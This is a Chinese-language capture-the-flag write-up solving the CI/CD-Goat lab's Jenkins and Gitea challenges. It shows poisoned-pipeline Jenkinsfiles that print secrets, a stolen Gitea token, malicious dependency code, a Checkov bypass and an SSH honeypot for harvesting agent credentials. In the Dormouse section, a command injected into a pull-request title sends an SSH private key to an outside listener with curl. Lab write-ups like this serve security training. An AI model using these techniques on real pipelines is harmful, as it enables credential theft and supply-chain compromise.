CiCd-Goat

前提

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
- Jenkins:http://localhost:8080
- Username: alice
- Password: alice
- Gitea:http://localhost:3000
- Username: thealice
- Password: thealice

如果你想仔细查看管理员是如何配置的环境,可以使用如下凭据登录后台:
- CTFd
- Username: admin
- Password: ciderland5#
- Jenkins
- Username: admin
- Password: ciderland5#
- Gitea
- Username: red_queen
- Password: ciderland5#

Easy

White Rabbit

我来晚了,我来晚了!没时间说你好,再见!在您被抓之前,请使用您对Wonderland/white-rabbit存储库的访问权限来窃取存储在 Jenkins 凭证存储中的flag1机密。
还有两个提示:

  1. 尝试通过存储库触发管道。
  2. 如何使用 Jenkinsfile 访问凭据?
  • jenkins修改一下配置
  • 使用admin账号登录

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-01_15-00-56_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-01_15-01-52_d41d8cd98f00b204e9800998ecf8427e.jpg

  • jenkins进入gitea
  • 根据提示进入相应的仓库

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-01_15-04-00_d41d8cd98f00b204e9800998ecf8427e.jpg

  • git下载来源码
1
git clone http://192.168.72.129:3000/Wonderland/white-rabbit.git

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-01_15-04-53_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 修改Jenkinsfile文件内容
1
2
3
4
5
6
7
8
9
stage ('Get_Flags') {
steps {
withCredentials([string(credentialsId: 'flag1', variable: 'flag1')]) {
sh '''
echo $flag1 | base64
'''
}
}
}

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-01_15-08-31_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 使用git命令提交
1
2
3
4
git checkout -b challenge1
git add .
git commit -m 'first'
git push -u origin challenge1

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-01_15-09-41_d41d8cd98f00b204e9800998ecf8427e.jpg

  • gitea可以看到新的分支

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-01_15-11-26_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 创建合并请求

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-01_15-12-34_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 回到jenkins

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-01_15-13-58_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-01_15-14-16_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-01_15-15-18_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-01_15-16-47_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-01_15-17-13_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 往下翻

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-01_15-17-45_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 解密找到flag

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-01_15-18-37_d41d8cd98f00b204e9800998ecf8427e.jpg

Mad Hatter

  • 这个个跟上面差不多
  • git下来仓库

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_13-43-42_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 修改文件

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_13-44-11_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 切换分支提交

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_13-45-00_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 去gitea请求合并

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_13-45-49_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 回到jenkins

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_13-46-26_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_13-47-34_d41d8cd98f00b204e9800998ecf8427e.jpg

  • console output

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_13-48-04_d41d8cd98f00b204e9800998ecf8427e.jpg

  • b64解码提交

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_13-49-23_d41d8cd98f00b204e9800998ecf8427e.jpg

Duchess

  • 下载靶场仓库
1
git clone http://192.168.72.129:3000/Wonderland/duchess.git
  • 下载工具
1
2
3
4
5
cd duchess

wget https://github.com/gitleaks/gitleaks/releases/download/v8.18.0/gitleaks_8.18.0_linux_x64.tar.gz

./gitleaks detect -v

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_14-12-08_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_14-16-23_d41d8cd98f00b204e9800998ecf8427e.jpg

Moderate

Caterpillar

  • 先fork仓库,并修改fork仓库中的Jenkinsfile文件,输出Jenkins的环境变量
  • 请求合并到主分支
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
pipeline {
agent any

stages {
stage('Install_Requirements') {
steps {
sh '''
env
'''
// 执行安装依赖步骤
}
}
// 其他阶段...
}
}

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_14-56-31_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 回到jenkins查看

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_14-57-22_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 得到GITEA_TOKEN,使用该Gitea令牌克隆原仓库
1
GITEA_TOKEN=5d3ed5564341d5060c8524c41fe03507e296ca46

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_15-24-23_d41d8cd98f00b204e9800998ecf8427e.jpg

1
git clone http://5d3ed5564341d5060c8524c41fe03507e296ca46@192.168.72.129:3000/Wonderland/caterpillar.git

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_15-03-32_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 之后再创建分支并提交、合并,即可触发另一个wonderland-caterpillar-prod的管道
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
pipeline {
agent any

stages {
stage('deploy') {
steps {
withCredentials([usernamePassword(credentialsId: 'flag2', usernameVariable: 'flag2', passwordVariable: 'TOKEN')]) {
sh 'echo $TOKEN | base64'
}
}
}
// 其他阶段...
}
}

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_15-21-50_d41d8cd98f00b204e9800998ecf8427e.jpg

  • b64解密,提交

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_15-25-28_d41d8cd98f00b204e9800998ecf8427e.jpg

Cheshire Cat

  • 克隆仓库,创建分支并修改Jenkinsfile
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
pipeline {
agent {label 'built-in'}
environment {
PROJECT = "sanic"
}
stages {
stage ('Install_Requirements') {
steps {
sh 'cat ~/flag5.txt'
}
}
}
post {
always {
cleanWs()
}
}
}
  • lag5.txt是在节点“Built-In Node”的文件系统上,因此只需要直接执行命令获取该文件内容即可。找到对应的节点,在Script Console中执行Groovy脚本
1
println "cat /var/jenkins_home/flag5.txt".execute().text

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_16-16-49_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-02_16-17-09_d41d8cd98f00b204e9800998ecf8427e.jpg

Twiddledum

目标是一个文件夹,gitea上有两个仓库,一个是twiddledee一个是twiddledum,尝试在jenkins里面构建twiddledum,发现pipeline中执行了node index.js,index.js中require了twiddledee,而且twiddledum不可控,而twiddledee可控,因此往twiddledee中注入恶意代码。

  • 修改twiddledee的index.js,直接push到main分支上。
1
2
var pjson = require('./package.json');
console.log(Buffer.from(process.env.FLAG6).toString("base64"))

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-10_15-43-46_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 把之前1.1.0的版本发布和tag删除后重新发布:

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-10_15-45-49_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-10_15-46-18_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-10_15-46-37_d41d8cd98f00b204e9800998ecf8427e.jpg

Twiddledum遇到的问题

  • nmp报错

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-10_15-48-27_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 个人解决办法-修改host

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-10_15-49-32_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 修改前

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-10_15-50-09_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-10_15-51-13_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 修改后

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-10_15-50-51_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-10_15-51-34_d41d8cd98f00b204e9800998ecf8427e.jpg

dodo

  • 创建一个.checkov.yml
1
2
3
soft-fail: true
check:
- THIS_NOT_THE_CHECK_YOUR_ARE_LOOKING_FOR

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-10_16-44-33_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 修改main.tf中的bucket acl为public-read

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-10_16-45-19_d41d8cd98f00b204e9800998ecf8427e.jpg

  • push之后build就可以绕过检测得到flag。

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-10_16-46-24_d41d8cd98f00b204e9800998ecf8427e.jpg

一些报错

  • 修改host

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-10_16-47-16_d41d8cd98f00b204e9800998ecf8427e.jpg

Hard

Hearts

  • Knave是agent的admin
  • 爆破得知: knave/rockme

部署ssh蜜罐

1
docker run -p 2222:2222 cowrie/cowrie
  • 端口转发
1
2
3
4
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -P FORWARD ACCEPT
iptables -A INPUT -p tcp --dport 2222 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222
  • 注意cowrie要前台运行能直接看到结果

新建nodes

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-14_14-21-04_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-14_14-24-30_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-14_14-25-22_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 点击 save 等待结果

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-14_14-26-45_d41d8cd98f00b204e9800998ecf8427e.jpg

Dormouse

  • 题目仓库Wonderland/dormouse
  • 根据Jenkinsfile
  • http://0177.0.0.01:8008/reportcov.sh127.0.0.1:8008/reportcov.sh

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-14_14-39-35_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 根据这条链接得知还有个仓库Cov/reportcov
  • 根据Jenkinsfile

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-14_14-43-20_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 根据大佬解析可以执行P-PPE攻击。
  • 根据下面的代码:
1
2
3
4
5
6
stage ('Deploy') {
steps {
sh "set +x && echo \"${KEY}\" > key && chmod 400 key && set -x"
sh 'scp -o StrictHostKeyChecking=no -i key reportcov.sh root@prod:/var/www/localhost/htdocs'
}
}
  • 执行的node上存在$KEY,是ssh的私钥,可以利用代码注入获取这个私钥,并通过scp传送reportcov.sh文件来把恶意的reportcov.sh文件传送过去,这样dormouse仓库build的时候就会执行我们的恶意代码。

  • Cov/reportcovfork下来,随便修改些东西push上去,发起合并请求,在tile处注入恶意代码,记得监听端口
1
`echo "${KEY}" > key && curl -v -F file=@key http://192.168.88.43:64434`

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-14_14-49-15_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 在监听端口处

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-14_14-50-19_d41d8cd98f00b204e9800998ecf8427e.jpg

Mock Turtle

  • enkins代码有三层判断,
  • 第一部分是检查增加的单词数和减少的单词数必须相同
  • 第二部分是判断version文件是否只有一行,并且符合x.y.z的格式
  • 第三部分是判断pull request中是否修改了version文件。满足上面条件就会执行merge

  • 因此修改Jenkinsfile
1
2
3
4
5
6
7
8
9
10
11
12
pipeline {
agent any
stages {
stage('pr_checks') {
steps {
withCredentials([usernamePassword(credentialsId: 'flag10', usernameVariable: 'flag10', passwordVariable: 'TOKEN')]) {
sh 'echo $TOKEN | base64'
}
}
}
}
}
  • 修改version
1
1.0.13
  • 新建1.txt,补上减去的单词数
1
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
  • 实现增减相同

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-14_15-44-42_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 请求合并,查看jenkins

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-11-14_15-46-00_d41d8cd98f00b204e9800998ecf8427e.jpg

Gryphon

没看明白怎么回事占坑

可以参考大佬的文章

参考文章